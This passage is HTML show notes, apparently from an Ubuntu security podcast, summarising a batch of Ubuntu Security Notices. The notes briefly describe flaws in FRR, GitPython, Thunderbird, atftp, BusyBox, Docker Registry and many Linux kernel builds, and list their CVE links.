code execution / crash | DoS</li>
</ul>
<h3 id="usn-6323-1-frr-vulnerability--01-40">[<a href="https://ubuntu.com/security/notices/USN-6323-1">USN-6323-1</a>] FRR vulnerability (01:40)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-31490">CVE-2023-31490</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Missing length check when handling particular options - would cause an OOB
read and hence a crash of bgpd within frr - similar to recent issues like
<a href="/episode-198/#usn-6136-1-frr-vulnerabilities--06-19">[USN-6136-1] FRR vulnerabilities from Episode 198</a></li>
</ul>
<h3 id="usn-6326-1-gitpython-vulnerability--02-11">[<a href="https://ubuntu.com/security/notices/USN-6326-1">USN-6326-1</a>] GitPython vulnerability (02:11)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-40267">CVE-2023-40267</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Incomplete fix for historical <a href="https://ubuntu.com/security/CVE-2022-24439">CVE-2022-24439</a> (<a href="/episode-192/#usn-5968-1-gitpython-vulnerability-00-46">[USN-5968-1] GitPython vulnerability from Episode 192</a>)</li>
<li>Essentially allows to get RCE since calls <code>git clone</code> and doesn&rsquo;t completely
validate the options and so leads to shell-command injection - thanks to
Sylvain Beucler from Debian LTS team for noticing this and pointing it out to
the upstream project</li>
</ul>
<h3 id="usn-6333-1-thunderbird-vulnerabilities--03-00">[<a href="https://ubuntu.com/security/notices/USN-6333-1">USN-6333-1</a>] Thunderbird vulnerabilities (03:00)</h3>
<ul>
<li>9 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4056">CVE-2023-4056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4055">CVE-2023-4055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4049">CVE-2023-4049</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4048">CVE-2023-4048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4047">CVE-2023-4047</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4050">CVE-2023-4050</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4046">CVE-2023-4046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4045">CVE-2023-4045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3417">CVE-2023-3417</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>102.15.0</li>
</ul>
<h3 id="usn-6334-1-atftp-vulnerabilities--03-10">[<a href="https://ubuntu.com/security/notices/USN-6334-1">USN-6334-1</a>] atftp vulnerabilities (03:10)</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-46671">CVE-2021-46671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41054">CVE-2021-41054</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6097">CVE-2020-6097</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>TFTP server and client packages</li>
<li>All 3 issues in the atftpd server
<ul>
<li>assertion failure when handling crafted Multicast Read Request</li>
<li>buffer overflow when handling crafted request with multiple options</li>
<li>buffer overread when handling crafted options data - would read past the
array of options and into adjacent memory - according to the CVE this would
then be the data from <code>/etc/group</code> on the server but likely this is not
deterministic and would be whatever else was on the heap</li>
</ul>
</li>
</ul>
<h3 id="usn-6335-1-busybox-vulnerabilities--05-20">[<a href="https://ubuntu.com/security/notices/USN-6335-1">USN-6335-1</a>] BusyBox vulnerabilities (05:20)</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-48174">CVE-2022-48174</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28831">CVE-2021-28831</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Invalid <code>free()</code> on malformed gzip data - on error, sets bit 1 of a pointer to
indicate that an error occurred - would then go and pass this pointer to
<code>free()</code> but now the pointer is 1-byte past where it should be - so need to
unset this bit first</li>
<li>In shell handling of crafted input could trigger a stack overflow when parsing
certain arithmetic expressions -&gt; crash / RCE - BUT since this is in parsing
of shell expressions anyway could just easily pass actual shell code to
evaluate surely?</li>
</ul>
<h3 id="usn-6336-1-docker-registry-vulnerabilities--07-52">[<a href="https://ubuntu.com/security/notices/USN-6336-1">USN-6336-1</a>] Docker Registry vulnerabilities (07:52)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2253">CVE-2023-2253</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-11468">CVE-2017-11468</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Tools to pack and server docker images - ie. to stand up your own docker
registry for serving OCI images</li>
<li>Two different DoS since didn&rsquo;t place any bounds on the size of various
parameters in requests - so when handling a crafted request with a very large
value, would try and allocate enough memory for that and then potentially run
out of memory and crash</li>
<li>Even in languages like Go which are memory safe, we still run into real world
limits like this - whilst in computing we like to have abstractions like
unlimited memory, and can generally program assuming this to be true, need to
be careful still when handling untrusted input</li>
</ul>
<h3 id="usn-6321-1-linux-kernel-vulnerabilities--09-21">[<a href="https://ubuntu.com/security/notices/USN-6321-1">USN-6321-1</a>] Linux kernel vulnerabilities (09:21)</h3>
<ul>
<li>10 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4015">CVE-2023-4015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4004">CVE-2023-4004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3995">CVE-2023-3995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3777">CVE-2023-3777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3610">CVE-2023-3610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.2 for <a href="https://ubuntu.com/blog/canonical-enables-ubuntu-on-starfives-visionfive-risc-v-boards">StarFive</a> and GCP</li>
<li>Covered previously in <a href="/episode-207/#usn-6315-1-linux-kernel-vulnerabilities--06-58">[USN-6315-1] Linux kernel vulnerabilities from Episode 207</a></li>
</ul>
<h3 id="usn-6325-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6325-1">USN-6325-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4015">CVE-2023-4015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4004">CVE-2023-4004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3995">CVE-2023-3995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3777">CVE-2023-3777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3610">CVE-2023-3610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21400">CVE-2023-21400</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.15 GKEOP, Intel IoTG</li>
</ul>
<h3 id="usn-6324-1-linux-kernel--gke--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6324-1">USN-6324-1</a>] Linux kernel (GKE) vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 for GKE</li>
</ul>
<h3 id="usn-6327-1-linux-kernel--kvm--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6327-1">USN-6327-1</a>] Linux kernel (KVM) vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3567">CVE-2023-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2985">CVE-2023-2985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6328-1-linux-kernel--oracle--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6328-1">USN-6328-1</a>] Linux kernel (Oracle) vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4015">CVE-2023-4015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4004">CVE-2023-4004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3995">CVE-2023-3995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3777">CVE-2023-3777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3610">CVE-2023-3610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6329-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6329-1">USN-6329-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6330-1-linux-kernel--gcp--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6330-1">USN-6330-1</a>] Linux kernel (GCP) vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4015">CVE-2023-4015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4004">CVE-2023-4004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3995">CVE-2023-3995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3777">CVE-2023-3777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3610">CVE-2023-3610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21400">CVE-2023-21400</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6331-1-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6331-1">USN-6331-1</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>21 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-33203">CVE-2023-33203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3111">CVE-2023-3111</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30772">CVE-2023-30772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28466">CVE-2023-28466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2194">CVE-2023-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1855">CVE-2023-1855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0590">CVE-2023-0590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1184">CVE-2022-1184</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0168">CVE-2022-0168</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36691">CVE-2020-36691</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6332-1-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6332-1">USN-6332-1</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>35 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4015">CVE-2023-4015</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4004">CVE-2023-4004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3995">CVE-2023-3995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3777">CVE-2023-3777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3610">CVE-2023-3610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3609">CVE-2023-3609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35829">CVE-2023-35829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35828">CVE-2023-35828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35824">CVE-2023-35824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35823">CVE-2023-35823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-33288">CVE-2023-33288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-33203">CVE-2023-33203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3268">CVE-2023-3268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32248">CVE-2023-32248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30772">CVE-2023-30772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28466">CVE-2023-28466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23004">CVE-2023-23004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2235">CVE-2023-2235</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2194">CVE-2023-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2163">CVE-2023-2163</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21400">CVE-2023-21400</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2002">CVE-2023-2002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1855">CVE-2023-1855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0597">CVE-2023-0597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48502">CVE-2022-48502</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-40982">CVE-2022-40982</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6337-1-linux-kernel--azure--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6337-1">USN-6337-1</a>] Linux kernel (Azure) vulnerabilities</h3>
<ul>
<li>16 CVEs addressed in Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-33203">CVE-2023-33203</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3111">CVE-2023-3111</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30772">CVE-2023-30772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28466">CVE-2023-28466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2194">CVE-2023-2194</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1855">CVE-2023-1855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0590">CVE-2023-0590</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4269">CVE-2022-4269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27672">CVE-2022-27672</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1184">CVE-2022-1184</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0168">CVE-2022-0168</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-36691">CVE-2020-36691</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6338-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6338-1">USN-6338-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38429">CVE-2023-38429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38428">CVE-2023-38428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38426">CVE-2023-38426</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32258">CVE-2023-32258</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32257">CVE-2023-32257</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32252">CVE-2023-32252</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32250">CVE-2023-32250</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32247">CVE-2023-32247</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2898">CVE-2023-2898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21255">CVE-2023-21255</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6339-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6339-1">USN-6339-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38429">CVE-2023-38429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38428">CVE-2023-38428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38426">CVE-2023-38426</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3212">CVE-2023-3212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2898">CVE-2023-2898</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21255">CVE-2023-21255</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48425">CVE-2022-48425</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6340-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6340-1">USN-6340-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35828">CVE-2023-35828</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35824">CVE-2023-35824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-35823">CVE-2023-35823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3268">CVE-2023-3268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2269">CVE-2023-2269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2163">CVE-2023-2163</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21255">CVE-2023-21255</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2002">CVE-2023-2002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6341-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6341-1">USN-6341-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3567">CVE-2023-3567</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3159">CVE-2023-3159</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0458">CVE-2023-0458</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6342-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6342-1">USN-6342-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3776">CVE-2023-3776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3611">CVE-2023-3611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31084">CVE-2023-31084</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2985">CVE-2023-2985</a> <!-- raw HTML omitted --></li>
